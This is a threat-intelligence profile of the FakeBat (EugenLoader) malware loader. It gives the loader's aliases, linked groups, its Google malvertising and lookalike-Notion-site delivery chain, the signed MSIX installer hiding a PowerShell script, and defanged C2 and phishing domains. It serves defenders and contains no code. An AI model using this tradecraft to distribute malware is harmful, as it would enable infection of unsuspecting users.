FakeBat | |
Addittional names | EugenLoader, Eugenfest, PaykLoader, Festik, Payk_34 and M1rages |
Type of Malware | Loader (Dropper) |
Date of initial activity | 2017 |
Associated Groups | APOTHECARY SPIDER, Storm-1113 |
Motivation | Used to delivered other malwares |
Attack Vectors | FakeBat (EugenLoader) is packaged in Microsoft installers (MSI or MSIX) distributed via social engineering lures. It is most commonly delivered via malicious ads (malvertising) on Google. |
Targeted System | Microsoft Windows operating systems |
Overview
FakeBat (EugenLoader) is a type of malware loader packaged in Microsoft installers (MSI or MSIX) distributed via social engineering lures. It is most commonly delivered via malicious ads (malvertising) on Google. The often large installers conceal a malicious PowerShell script responsible for communicating with the malicious infrastructure and retrieving a follow-up payload.
FakeBat is marketed using the handle “Eugenfest” on the Exploit hacker forum. The loader was also advertised on XSS forums under the pseudonym “Payk_34.” Eugenfest’s online activity can be traced to Russian-language carding and hacking forums dating back to 2017 under various aliases such as Festik, Payk_34, and M1rages (see appendix for list).
The actor previously ran an eBay fraud shop at fest-bay[.]com, which was populated with stolen credentials obtained by brute force attacks against the service. Fest-Bay was promoted on various carding forums and Telegram channels.
Targets
Primarily targets Microsoft Windows systems in Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Moldova, and Tajikistan.
How they operate
Distribution (Google ad → phishing site → MSIX → PowerShell)
The infection chain starts with a malicious ad via a Google search for Notion, the popular utility program. The ad uses the real website address for Notion, notion.so, and appears legitimate. Clicking on the ad redirects to a lookalike site hosted at notilion[.]co.
When the “Download for Windows” button is clicked, a request is made to download an MSIX file named Notion-x86.msix. This file appears to have a legitimate signature under the name Forth View Designs Ltd.
The final step in this delivery chain is the launch of the MSIX installer. Unbeknownst to the victim, a malicious PowerShell script is embedded into this installer and will execute the malicious payload.
Post Infection Traffic
The PowerShell script will connect to FakeBat’s command and control server (C2) located at utm-adrooz[.]com. This step in the infection chain determines the subsequent actions, particularly whether the follow-up payload will be served.
